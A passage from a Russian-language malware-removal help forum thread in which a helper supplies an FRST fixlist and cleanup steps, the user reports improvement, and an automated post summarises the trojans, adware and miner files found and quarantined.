MSCONFIG\startupreg: GUDelayStartup => "C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe" -delayrun
FirewallRules: [{D41216BA-86E4-4073-8A1F-3A2A17A8C576}] => (Allow) C:\Users\Александр и Ко\AppData\Local\yc\Application\yc.exe
Reboot:[/CODE]
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool
Отключите до перезагрузки антивирус, [U]закройте все браузеры[/U], в FRST нажмите один раз [B]Fix[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Сообщите, что с проблемой.
07.09.2017, 07:10
Tulio

Вложений: 1

Сделал. Тормозов стало меньше. В процессах только 20-25% IAStorDataMgrSvc.exe
07.09.2017, 19:54
Vvvyg

[url]http://www.nextwindows.ru/forum/topic_2327/3[/url]
08.09.2017, 20:26
Tulio

Спасибо за помощь!
09.09.2017, 20:53
Vvvyg

Удалите папку C:\FRST со всем содержимым.

Выполните [url="http://virusinfo.info/showthread.php?t=121902"]рекомендации после лечения[/url].
09.09.2017, 21:03
CyberHelper

Итог лечения

Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]3[/B][*]Обработано файлов: [B]11[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\programdata\microsoft\adobe\flash player\fb433554-a7a6-4743-bb9d-987243a435e0\3b3ad1e9-23af-4d20-b9f5-9a33efff78eb.exe - [B]UDS:DangerousObject.Multi.Generic[/B][*] c:\users\александр и ко\appdata\local\systemdir\nethost.exe - [B]Trojan.Win32.Agent.neszij[/B] ( DrWEB: Trojan.LoadMoney.1094, AVAST4: Win32:Dropper-gen [Drp] )[*] c:\users\александр и ко\appdata\roaming\windowsupdater\updater.exe - [B]not-a-virus:HEUR:AdWare.Win32.Generic[/B] ( BitDefender: Gen:Variant.Zusy.169520 )[*] c:\users\04ca~1\appdata\roaming\curl\curl_7_54.exe - [B]UDS:DangerousObject.Multi.Generic[/B][*] c:\windows\microsoft\svchost.exe - [B]Trojan.Win32.SelfDel.gbpf[/B][*] c:\windows\microsoft\svchost.exe.exe - [B]not-a-virus:RiskTool.Win64.BitCoinMiner.cwo[/B][*] c:\windows\system32\ea3host.exe - [B]not-a-virus:AdWare.Win64.Agent.mik[/B][/LIST][/LIST]